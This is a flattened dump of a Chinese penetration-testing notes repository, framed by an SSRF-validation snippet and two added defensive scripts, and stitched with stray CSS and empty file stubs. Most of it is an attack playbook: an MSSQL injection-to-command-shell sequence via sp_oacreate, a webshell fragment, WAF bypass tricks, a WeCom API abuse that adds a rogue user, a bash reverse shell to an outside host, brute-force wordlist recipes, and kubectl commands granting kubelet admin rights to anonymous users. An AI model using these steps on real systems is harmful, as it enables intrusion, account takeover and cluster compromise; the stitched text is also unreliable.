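    """Loopback, link-local (cloud metadata), unspecified, multicast and private ranges."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                    # ::ffff:127.0.0.1 is still loopback
    if ip.is_loopback or ip.is_link_local or ip.is_unspecified or ip.is_multicast:
        return True
    return any(ip in net for net in PRIVATE_NETS if net.version == ip.version)


def system_resolver(host: str) -> List[str]:
    """OS resolver; every address it returns is checked, not only the first."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def validate_destination(url: str, resolver: Callable[[str], List[str]] = system_resolver) -> Verdict:
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return Verdict(False, "scheme not allowed", None)
    host = parts.hostname                      # already lower-cased, IPv6 brackets removed
    if not host:
        return Verdict(False, "no host", None)
    if "%" in host:
        # A percent-encoded host is ambiguous: the filter and the HTTP client may
        # decode it differently, so refuse instead of guessing.
        return Verdict(False, "percent-encoded host", None)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = canonical_ipv4(host)
    if ip is not None:                         # a literal address, in any spelling
        if is_disallowed(ip):
            return Verdict(False, f"literal address {ip} is internal", None)
        return Verdict(True, "public literal address", str(ip))
    addrs = resolver(host)
    if not addrs:
        return Verdict(False, "unresolvable host", None)
    for a in addrs:
        try:
            if is_disallowed(ipaddress.ip_address(a)):
                return Verdict(False, f"{host} resolves to internal address {a}", None)
        except ValueError:
            return Verdict(False, f"unparseable address {a}", None)
    return Verdict(True, "resolves to public addresses only", addrs[0])


# Constructed stand-in for DNS so the example runs offline.
FAKE_ZONE = {"attacker-owned.example": ["127.0.0.1"], "api.partner.example": ["203.0.113.10"]}


def fake_resolver(host: str) -> List[str]:
    return FAKE_ZONE.get(host, [])
```

Calling `validate_destination("http://127.1/admin/", fake_resolver)` or the decimal and octal spellings returns a rejection, and so does `attacker-owned.example`, because the check runs on the resolved address rather than on the hostname string.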
-------------------------------------------------------------------------------- /04-漏洞利用/明源云.md: --------------------------------------------------------------------------------
SQL injection to GetShell
```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c cmd'
```
-------------------------------------------------------------------------------- /04-漏洞利用/符合JSPX的WebShell.md: --------------------------------------------------------------------------------
```
");
brs = br.readLine();
}
}catch(Exception ex){
out.println(ex.toString());
}
}]]>
```
-------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/readme.md: --------------------------------------------------------------------------------
The basic principle of WAF bypass is to transform the payload in various ways without affecting its normal execution. In practice it is somewhat hit-and-miss; in short, it comes down to combining the different approaches

### Approach 1: change the request method
Change the request method from GET to POST, or to a non-standard method such as DDD or XXX

### Approach 2: add multiple backslashes
How many backslashes are needed has to be tested case by case; image borrowed from abc123
![image](./image/01.png)

### Approach 3: add useless GET parameters
For example add username=xxxxx or password=sdfewfwfeewffew; image borrowed from abc123
![image](./image/02.png)

### Approach 4: mixed URL encoding
URL-encode parts of the request; encoding one short segment at a time works better against the WAF; image borrowed from abc123
![image](./image/03.png)

### Approach 5: junk data inside XML tags in the request body
For vulnerability 2019-2725, junk data can be added to the request body, for example between the `` tags; since it is a POST request, a very large amount of junk can be added; image borrowed from abc123
![image](./image/04.png)

### Approach 6: junk data in the request headers
For vulnerability 2019-2725, some WAF devices may inspect content beginning with `
--------------------------------------------------------------------------------
### 2. Exploitation process
1. Pass the obtained id and secret to the following API to obtain an AccessToken
```
https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=id&corpsecret=secrect
```
2. WeCom (企业微信) is organised into departments; through the WeCom API the company's structure and department IDs can be obtained, which are needed when adding a member. Querying the access key's permissions at the following API returns department names and department IDs
```
https://open.work.weixin.qq.com/devtool/query?e=301002
```
3. Send to the following API
```
https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
```
the following data
```
{
    "userid": "zhangsan",
    "name": "张三",
    "department": [6],
    "mobile": "1388888888"
}
```
Once the call succeeds, the phone number can be used to log into the target company's WeCom.
### 3. References
https://mp.weixin.qq.com/s/LMZVcZk7_1r_kOKRau5tAg
https://qydev.weixin.qq.com/wiki/index.php?title=%E7%AE%A1%E7%90%86%E6%88%90%E5%91%98#.E6.9B.B4.E6.96.B0.E6.88.90.E5.91.98
-------------------------------------------------------------------------------- /06-移动端/华为nova2下无需root安装Metasploit/readme.md: --------------------------------------------------------------------------------
Installing the Google Play Store on the Huawei nova 2 failed
Downloaded termux from http://www.apkmirror.com/
Transferred it to the phone over USB and installed it

In termux, run the following commands:
```
pkg install curl
curl -OL https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
ls -alh
./metasploit.sh
```
After a few minutes it asks "Do you want to continue? [y/n]" → press y

But it failed with the following error:
```
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
```

Fix: run the following commands:
```
gem install bundler
bundle install
```

It still failed with:
Gemfile.local missing (I think; I don't remember exactly)

Fix: run the following commands:
```
apt update
apt -y upgrade
apt -y install git ruby ruby-dev make clang autoconf curl wget ncurses-utils libsqlite-dev postgresql postgresql-dev libpcap-dev libffi-dev libxslt-dev pkg-config
git clone -b termux https://github.com/timwr/metasploit-framework.git
cd metasploit-framework
gem install bundler
gem install nokogiri -- --using-system-libraries
bundle install --gemfile Gemfile.local
./msfconsole
```

It still failed with:
```
can't find gem bundler ( >= 0.a) with executable bundle
```

Fix: run the following command:
```
gem install bundler -v 1.15.1
```

References:
https://techglimpse.com/metasploit-error-gem-bundler-solution/
https://lucideustech.blogspot.com/2018/02/attacking-windows-platform-with.html?m=1
https://github.com/rapid7/metasploit-framework/issues/8765
https://stackoverflow.com/questions/47026174/find-spec-for-exe-cant-find-gem-bundler-0-a-gemgemnotfoundexception
a:hover{text-decoration:none}.entrylistPostSummary{margin-top:5px;padding-left:5px;margin-bottom:5px}.entrylistItemPostDesc{text-align:right;color:#666}.entrylistItemPostDesc a:link,.entrylistItemPostDesc a:visited,.entrylistItemPostDesc a:active{color:#666}.entrylistItemPostDesc a:hover{color:#f60}.entrylist .postSeparator{clear:both;width:100%;font-size:0;line-height:0;margin:0;padding:0;height:0;border:none}.pager{text-align:right;margin-right:10px}.PostList{border-bottom:1px solid #ccc;clear:both;min-height:1.5em;_height:1.5em;padding-top:10px;padding-left:5px;padding-right:5px;margin-bottom:5px}.postTitl2{float:left}.postDesc2{color:#666;float:right}.postText2{clear:both;color:#666}.pfl_feedback_area_title{line-height:1.5;font-weight:bold;font-size:16px;border-bottom:1px solid #ccc;line-height:2.5em}.pfl_feedback_area_title a,.pfl_feedbackManage a{color:#690;margin:0 10px;font-weight:normal}.pfl_feedback_area_title a:hover,.pfl_feedbackManage a:hover{color:#f60}.pfl_feedbackManage a{margin:0 0 0 0}.pfl_feedbackItem{border-bottom:1px solid #ccc;margin-bottom:20px}.pfl_feedbacksubtitle{width:100%;border-bottom:1px dotted #ccc;height:2.5em;line-height:2.5em}.pfl_feedbackname{float:left;color:#a8b1ba}.pfl_feedbackManage{float:right}.pfl_feedbackCon{color:#000;padding:10px 0}.pfl_feedbackAnswer{color:#f40;text-indent:2em;padding-bottom:10px}.tdSentMessage{text-align:right}.errorMessage{width:300px;float:left}#Profile1_panelAdd td{padding:10px 0}.divPhoto{border:1px solid #ccc;padding:2px;margin-right:10px}.thumbDescription{color:#666;text-align:right;padding-top:5px;padding-bottom:5px;padding-right:10px;margin-bottom:10px}#footer{text-align:center;min-height:15px;_height:15px;border-top:1px solid #000;margin-top:10px;padding-top:10px;margin-bottom:10px}.personInfo{margin-bottom:20px}.pages{text-align:right}.postBody{line-height:1.5}.postBody p,.postCon p{text-indent:2em;margin:0 auto 1em auto}.postBody h2{font-size:150%;margin:15px auto 2px 
auto;font-weight:bold}.postBody h3{font-size:120%;margin:15px auto 2px auto;font-weight:bold}.postBody h4{font-size:110%;margin:15px auto 2px auto;font-weight:bold;color:#333}.postBody h5{font-size:100%;margin:15px auto 2px auto;font-weight:bold;color:#333}.postBody a:link,.postBody a:visited,.postBody a:active{text-decoration:underline}.postCon a:link,.postCon a:visited,.postCon a:active{text-decoration:underline}.postBody ul,.postCon ul{margin-left:2em}.postBody li,.postCon li{list-style-type:disc;margin-bottom:1em}.postBody blockquote{background:url('images/comment.gif') no-repeat 25px 0;line-height:1.6;color:#333}.div_my_zzk{margin-left:13px}.input_my_zzk{width:120px}.blog_comment_body a:link{text-decoration:underline}#cnblogs_post_body img{max-width:820px}#sidebar_ad,#sidebar_c3{margin:0 auto 15px auto}
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/cnblogs.css: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/container.html: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f(1).txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f(2).txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/harmoonos-developer-competition-2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/harmoonos-developer-competition-2.jpg
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/icon_weibo_24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/icon_weibo_24.png
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/lite-mode-check.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.gif
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/message.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/myblog.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/newpost.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/search.svg: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/sodar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/sodar
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/tctip.min.js.下载: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/wechat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/wechat.png
--------------------------------------------------------------------------------
/06-移动端/安卓端安装BurpSuite证书/readme.md:
--------------------------------------------------------------------------------
Reference article: https://www.cnblogs.com/liuqiyun/p/12488845.html

A backup copy of the article is also kept here.
--------------------------------------------------------------------------------
/06-移动端/小米手机配置BurpSuite证书/readme.md:
--------------------------------------------------------------------------------
Downloading the certificate through the phone's browser does not work.

Transfer it to the phone via QQ instead.

Xiaomi phones do not recognize the .der extension; rename the file to .crt.

Tap Passwords & security -> System security -> Encryption & credentials -> Trusted credentials.

https://blog.csdn.net/helloexp/article/details/99720456
https://xuexuguang.gitee.io/pages/6cceb5/#%E8%AF%81%E4%B9%A6%E5%AE%89%E8%A3%85
--------------------------------------------------------------------------------
/06-移动端/移动端抓不到包问题解决总结/readme.md:
--------------------------------------------------------------------------------
1. After configuring the proxy, the phone can open an http site, but the traffic is not going through Burp?
If the phone has a VPN connected, the traffic will not go through Burp.

2. After configuring the proxy, the phone hangs when opening an http site, and Burp captures no packets?
This problem occurs at home but not at the office.
--------------------------------------------------------------------------------
/07-云安全/知识星球分享-隐藏信息接管k8s集群.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/07-云安全/知识星球分享-隐藏信息接管k8s集群.pdf
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# 01-Case Studies
```
[A simulated environment built by another practitioner: from GetShell to root privilege escalation] https://mp.weixin.qq.com/s/LK8zfWlz0s3v93sIY9DztQ
```

# 02-Asset Collection
```
Target company -> look up parent and subsidiary companies on Tianyancha -> look up supply-chain companies on Tianyancha

0x01 Subdomain collection (collect subdomains from the company's root domains):
01 Cyberspace mapping engines
02 DNS resolution
03 SSL certificates
04 Subdomain brute-forcing

0x02 IP range collection (first determine whether the target is behind a CDN):
ping from multiple locations
cyberspace mapping engines

0x03 Web directory scanning:
https://github.com/ffuf/ffuf

0x04 Extracting API endpoints from JavaScript:
https://github.com/GerbenJavado/LinkFinder
https://github.com/rtcatc/Packer-Fuzzer

0x05 Host collision (see Host碰撞原理.md for how it works):
https://github.com/pmiaowu/HostCollision

0x06 403 bypass (see 403绕过原理.md for how it works):
https://github.com/asaotomo/forbiddenpass-Hx0

0x07 Historical DNS resolution records:
https://ip138.com/

0x08 Punycode encoding (I saw Punycode used for asset collection in the article [Compromising an entire intranet through one weak password during an attack-defense exercise] https://mp.weixin.qq.com/s/lKa0SZezqh9diWe-0NqmiA. I had never heard of it before; after asking DeepSeek I got a basic understanding, and my thinking is this: some government and public-sector domain names contain Chinese characters, but a Chinese domain name must be Punycode-encoded when it is entered into the domain name system, so I assume the author collected subdomains using the Punycode encodings of the Chinese names):
https://myssl.com/punycode.html
```

# 03-Vulnerability Detection
```
https://github.com/chaitin/xray
https://github.com/projectdiscovery/nuclei
https://github.com/m-sec-org/EZ
https://github.com/zan8in/afrog

https://docs.projectdiscovery.io/templates/protocols/http/raw-http-examples
https://docs.projectdiscovery.io/templates/introduction

When running batch vulnerability checks with nuclei, if you suspect a template is at fault, validate it with the following command
nuclei.exe -validate -t template.yaml

The default concurrency is 25
-c, -concurrency int  maximum number of templates to be executed in parallel (default 25)
```

# 04-Vulnerability Exploitation
```
https://github.com/swisskyrepo/PayloadsAllTheThings

0x01 After obtaining a command-execution entry point
01. Reverse shell
1.1 First determine whether the target has outbound network access
see -> xxx.md
1.2 Then determine which programs on the system can be used for a reverse shell
whereis bash nc exec telnet python php perl ruby java go gcc g++ curl wget
which bash nc exec telnet python php perl ruby java go gcc g++ curl wget
1.3 Finally start the reverse shell
/bin/bash -i >& /dev/tcp/1.1.1.1/1111 0>&1
02. If the reverse shell fails, try URL-encoding the payload
https://tool.chinaz.com/tools/urlencode.aspx
03. If the target has no outbound access, write a one-line webshell with echo
echo "">1.php
1.php ->

Testing in Burp and in bash showed that running the following command
echo "">1.php
leaves 1.php with the content below, which is not a correct PHP one-liner

On Windows, echo "bbb">3.txt writes the double quotes into the file; on Linux, echo "bbb">3.txt does not.
04. If the echo write fails, try base64 encoding

0x02 After obtaining a SQL injection entry point
01. If OS commands can be executed and you want to write a webshell but run into Chinese characters, hex-encode them
Reference:
https://mp.weixin.qq.com/s/5wIqAeMW1IveoxU2sveMfA

0x03 Webshell AV evasion
https://github.com/AntSwordProject/antSword
https://github.com/rebeyond/Behinder
https://github.com/BeichenDream/Godzilla
https://github.com/shack2/skyscorpion
https://github.com/Chora10/Cknife
https://github.com/Tas9er/ByPassBehinder4J
https://github.com/cseroad/Webshell_Generate
https://github.com/G0mini/Bypass
http://bypass.tidesec.com/web/
https://github.com/czz1233/GBByPass
https://github.com/AabyssZG/WebShell-Bypass-Guide/tree/main

0x04 Executing commands from a webshell despite disable_functions
https://github.com/mm0r1/exploits/tree/master/php-filter-bypass

0x05 Executing commands from a webshell with 360 present
https://mp.weixin.qq.com/s/OGwo1zoN1LS3aYalZ_PePw

0x06 WAF bypass via PHP tag variants
# Style 1: standard tag

# Style 2: short tag, available since PHP 5.4

# Style 3: ASP style
<% echo 1; %>

# Style 4: long tag

0x07 Bypassing the 瑞数 (Ruishu) dynamic WAF
https://github.com/wjlin0/riverPass
https://github.com/R0A1NG/Botgate_bypass

0x08 WAF bypass for OWASP Top 10 vulnerabilities
https://github.com/leveryd/x-waf
```

# 05-Password Attacks
```
# Attack 1
Weak credentials to try by hand once you reach a system
admin admin
admin admin123
admin admin888
admin 123456
test test
test 123456

# Attack 2
If manual attempts fail, start brute-forcing; there is technique to that as well. Use (the organization's domain name + the initials of the organization's name) as seeds to generate a batch of wordlists. Taking Beijing Normal University as an example, the seeds are:
bnu
bjsf

Generated wordlist:
(all lowercase / all uppercase / capitalized)1
(all lowercase / all uppercase / capitalized)123
(all lowercase / all uppercase / capitalized)@123
(all lowercase / all uppercase / capitalized)@(all lowercase / all uppercase / capitalized)1
(all lowercase / all uppercase / capitalized)@(all lowercase / all uppercase / capitalized)123

Brute-force method 1: common/default usernames + the wordlist as passwords
Brute-force method 2: the wordlist as usernames + common/default passwords

# Attack 3
If neither of the above works, pull out your stockpiled wordlists and try your luck
```

# 06-Mobile
```
Bypassing forced APP updates
Bypassing Frida anti-debugging
Bypassing APP proxy detection
Root detection and bypass approaches

Android 7.0 HTTPS capture: roundup of solutions for one-way and mutual TLS verification
https://www.yuanrenxue.cn/app-crawl/android-7-capture-data.html

Bypassing mutual SSL verification to capture Soul App traffic
https://blog.csdn.net/qq_38316655/article/details/104176882

Some tips for APP penetration testing
https://mp.weixin.qq.com/s/IDv2ERO54TdDgvAcvx7FYQ

Using the autodecoder plugin against an app to bypass encrypted packets + replay protection
https://mp.weixin.qq.com/s/v77kfoRcP9Jo7939402Ykg

Automated mini-program penetration testing
https://mp.weixin.qq.com/s/ebZjE_85RLIC5TZQ1JC1og
```

# 07-Cloud Security
```
# Get all nodes in the current cluster
.\kubectl -s 172.31.32.36:8089 get nodes
# Get node details
.\kubectl -s 172.31.32.36:8089 describe node 10-8-0-135
# Get all pods on the current node
.\kubectl -s 172.31.32.36:8089 get pods
# Get details of a specific pod
.\kubectl -s 172.31.32.36:8089 describe pod wpsai-apollo-adminservice-744b6bddcd-hdngw

# Get cluster IPs
.\kubectl.exe -s 172.31.32.36:8089 -n default get service
.\kubectl.exe -s 172.31.32.36:8089 get pods -o wide
--kubelet-client-certificate=ca.crt --kubelet-client-key=token.txt
.\kubectl.exe -s 172.31.32.36:8089 --namespace=default exec -it wpsai-apollo-adminservice-744b6bddcd-hdngw bash
.\kubectl.exe -s 172.31.32.36:8089 create clusterrolebinding kube-apiserver:kubelet-apis --clusterrole=system:kubelet-api-admin --user=system:anonymous
.\kubectl -s 172.31.32.36:8089 create clusterrolebinding kube-apiserver:kubelet-apis --clusterrole=system:kubelet-api-admin --user kubernetes-master
.\kubectl -s 172.31.32.36:8089 describe pod/wpsai-apollo-adminservice-744b6bddcd-hdngw -n default
```
--------------------------------------------------------------------------------
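The Punycode point in 02-Asset Collection (Chinese domain labels live in DNS and in certificates only as xn-- A-labels) is illustrated by this added example, which is not code from this repository: it maps an organization's IDN hostnames to their ASCII form and back so they can be matched against DNS and certificate data. The sample SAN list is constructed; 中国 -> xn--fiqs8s is the real encoding of the Chinese ccTLD label.

```python
# Added example: convert internationalized (e.g. Chinese) hostnames to the
# Punycode / A-label form under which they actually appear in DNS, and back.
# Standard library only; the sample hostnames below are constructed.

def to_ascii(hostname: str) -> str:
    """Return the ASCII (xn--) form of a possibly Unicode hostname.

    Each label is encoded separately, so a mixed name such as
    "www.示例.中国" keeps its ASCII labels untouched.
    """
    labels = hostname.rstrip(".").split(".")
    return ".".join(label.encode("idna").decode("ascii") for label in labels)


def to_unicode(hostname: str) -> str:
    """Inverse of to_ascii: decode xn-- labels back to Unicode."""
    labels = hostname.rstrip(".").split(".")
    return ".".join(label.encode("ascii").decode("idna") for label in labels)


def is_idn(hostname: str) -> bool:
    """True if any label of an ASCII hostname is a Punycode A-label."""
    return any(label.lower().startswith("xn--") for label in hostname.split("."))


def inventory_idn_names(hostnames):
    """Map every IDN hostname in an asset list to its Unicode form.

    Handy when reviewing certificate SANs or zone exports, where Chinese
    names show up only as xn-- labels and are easy to overlook.
    """
    return {h: to_unicode(h) for h in hostnames if is_idn(h)}


# Constructed sample: SAN entries as they might appear in a certificate.
SAMPLE_SANS = [
    "www.example.gov.cn",
    "xn--fiqs8s",            # 中国
    "mail.xn--0zwm56d",      # 测试 (the IANA Chinese test TLD label)
]

if __name__ == "__main__":
    print(to_ascii("中国"))                 # xn--fiqs8s
    print(inventory_idn_names(SAMPLE_SANS))
```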
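The 07-Cloud Security notes end with a ClusterRoleBinding that grants system:kubelet-api-admin to system:anonymous. As an added defender-side check (not code from this repository), the script below parses the JSON that `kubectl get clusterrolebindings -o json` prints and flags every binding whose subjects include the anonymous user or the unauthenticated group; SAMPLE_JSON is constructed and contains the binding from the notes alongside a benign one.

```python
# Added example: audit ClusterRoleBindings for grants to identities that any
# client gets without presenting credentials. Input is the JSON produced by
#   kubectl get clusterrolebindings -o json
# SAMPLE_JSON is constructed, not taken from a real cluster.
import json

# Identities assigned to requests that carry no valid credentials.
ANONYMOUS_SUBJECTS = {
    ("User", "system:anonymous"),
    ("Group", "system:unauthenticated"),
}


def find_anonymous_grants(bindings_json: str) -> list:
    """Return (binding name, roleRef name, subject name) per risky subject.

    Walks every ClusterRoleBinding in a kubectl JSON list and reports
    subjects matching ANONYMOUS_SUBJECTS. Bindings with no 'subjects'
    field (legal in the API) are skipped.
    """
    data = json.loads(bindings_json)
    findings = []
    for item in data.get("items", []):
        name = item.get("metadata", {}).get("name", "<unnamed>")
        role = item.get("roleRef", {}).get("name", "<no roleRef>")
        for subj in item.get("subjects") or []:
            if (subj.get("kind"), subj.get("name")) in ANONYMOUS_SUBJECTS:
                findings.append((name, role, subj.get("name")))
    return findings


# Constructed sample: a benign binding, the one created in the 07 notes,
# and a binding without subjects.
SAMPLE_JSON = json.dumps({
    "apiVersion": "v1", "kind": "List",
    "items": [
        {"metadata": {"name": "cluster-admin"},
         "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
         "subjects": [{"kind": "Group", "name": "system:masters"}]},
        {"metadata": {"name": "kube-apiserver:kubelet-apis"},
         "roleRef": {"kind": "ClusterRole", "name": "system:kubelet-api-admin"},
         "subjects": [{"kind": "User", "name": "system:anonymous"}]},
        {"metadata": {"name": "no-subjects"},
         "roleRef": {"kind": "ClusterRole", "name": "view"}},
    ],
})

if __name__ == "__main__":
    for binding, role, who in find_anonymous_grants(SAMPLE_JSON):
        print(f"ClusterRoleBinding {binding} grants {role} to {who}")
```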